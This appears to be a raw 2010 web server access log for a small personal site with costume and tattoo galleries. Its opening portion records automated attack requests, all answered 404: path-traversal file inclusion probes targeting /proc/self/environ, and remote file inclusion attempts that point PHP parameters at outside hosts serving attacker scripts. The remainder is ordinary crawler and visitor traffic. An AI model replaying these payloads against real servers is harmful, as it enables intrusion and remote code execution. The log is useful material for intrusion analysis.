82.96.90.170 - - [04/May/2010:10:49:46 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
82.96.90.170 - - [04/May/2010:10:49:46 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
216.120.232.2 - - [04/May/2010:10:51:27 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""oi"
216.120.232.2 - - [04/May/2010:10:51:28 -0500] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""oi"
216.120.232.2 - - [04/May/2010:10:51:28 -0500] "GET /logs/access_log.1232668800/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""oi"
64.235.49.38 - - [04/May/2010:10:52:07 -0500] "GET /logs//uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.235.49.38 - - [04/May/2010:10:52:07 -0500] "GET //uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.235.49.38 - - [04/May/2010:10:52:07 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
82.96.90.170 - - [04/May/2010:10:52:44 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
82.96.90.170 - - [04/May/2010:10:52:44 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.235.49.38 - - [04/May/2010:10:53:25 -0500] "GET /logs//uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
64.235.49.38 - - [04/May/2010:10:53:25 -0500] "GET //uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 315 "-""Mozilla/5.0"
64.235.49.38 - - [04/May/2010:10:53:26 -0500] "GET /logs/access_log.1270598400//uigaproxy/include/template.php?content=http://martlume.com/data/auto1.txt???? HTTP/1.1" 404 342 "-""Mozilla/5.0"
216.120.232.2 - - [04/May/2010:10:53:55 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""oi"
216.120.232.2 - - [04/May/2010:10:53:55 -0500] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""oi"
216.120.232.2 - - [04/May/2010:10:53:55 -0500] "GET /logs/access_log.1232668800/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""oi"
216.120.232.2 - - [04/May/2010:10:55:02 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""oi"
216.120.232.2 - - [04/May/2010:10:55:02 -0500] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 332 "-""oi"
216.120.232.2 - - [04/May/2010:10:55:02 -0500] "GET /logs/access_log.1232668800/modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""oi"
77.222.56.62 - - [04/May/2010:10:55:08 -0500] "GET /logs/access_log.1272067200//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:10:55:09 -0500] "GET //webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:10:55:12 -0500] "GET /logs//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:10:58:44 -0500] "GET /logs/access_log.1272067200//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:10:58:44 -0500] "GET //webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
77.222.56.62 - - [04/May/2010:10:58:44 -0500] "GET /logs//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
207.46.199.182 - - [04/May/2010:11:03:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.237.227.75 - - [04/May/2010:11:06:16 -0500] "GET /costume/links.htm HTTP/1.1" 200 1029 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
83.237.227.75 - - [04/May/2010:11:06:22 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
83.237.227.75 - - [04/May/2010:11:06:36 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( )"
77.222.56.62 - - [04/May/2010:11:07:02 -0500] "GET /logs/access_log.1270857600//webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://ttrr.interfree.it/id.jpg?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
222.236.47.182 - - [04/May/2010:11:08:19 -0500] "GET /logs/access_log.1266364800//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:19 -0500] "GET //contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:19 -0500] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:19 -0500] "GET /logs/access_log.1264723200//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:22 -0500] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:23 -0500] "GET /logs/access_log.1266364800//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:23 -0500] "GET //contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:08:30 -0500] "GET /logs/access_log.1264723200//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.46.199.40 - - [04/May/2010:11:08:53 -0500] "GET /logs/access_log.1231372800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [04/May/2010:11:09:39 -0500] "GET //contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:09:39 -0500] "GET /logs/access_log.1266364800//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:09:39 -0500] "GET /logs/access_log.1264723200//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
222.236.47.182 - - [04/May/2010:11:09:39 -0500] "GET /logs//contrib/yabbse/poc.php?poc_root_path=http://host67.hrwebservices.net/~allstag/AllstagePhotos/data/Fx29ID1.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
87.250.255.243 - - [04/May/2010:11:11:44 -0500] "GET /logs/access_log.1272672000 HTTP/1.1" 200 502112 "-""Yandex/1.01.001 (compatible; Win16; I)"
178.83.239.113 - - [04/May/2010:11:15:44 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://www.google.ch/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat-cd1.jpg&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__ZQW5tDuHd7NH9hPEBuRT8827w9Y=&h=364&w=405&sz=67&hl=en&start=13&um=1&itbs=1&tbnid=l48fMOZCNyJY3M:&tbnh=111&tbnw=124&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26um%3D1%26hl%3Den%26client%3Dfirefox-a%26sa%3DX%26rls%3Dorg.mozilla:en-US:official%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
207.46.195.226 - - [04/May/2010:11:20:24 -0500] "GET /logs/access_log.1237593600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.81.135.7 - - [04/May/2010:11:22:47 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.it/search?q=vintage+tattoo&rls=com.microsoft:it:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GGLR_it&redir_esc=&ei=M0ngS5SWEMqd_Aad6P3MBw""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:48 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:51 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:54 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:55 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:55 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:55 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:55 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:22:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:07 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:08 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:08 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:08 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:08 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:40 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:41 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:42 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:42 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:42 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:42 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:55 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:55 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:55 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
91.81.135.7 - - [04/May/2010:11:23:55 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.0.30729)"
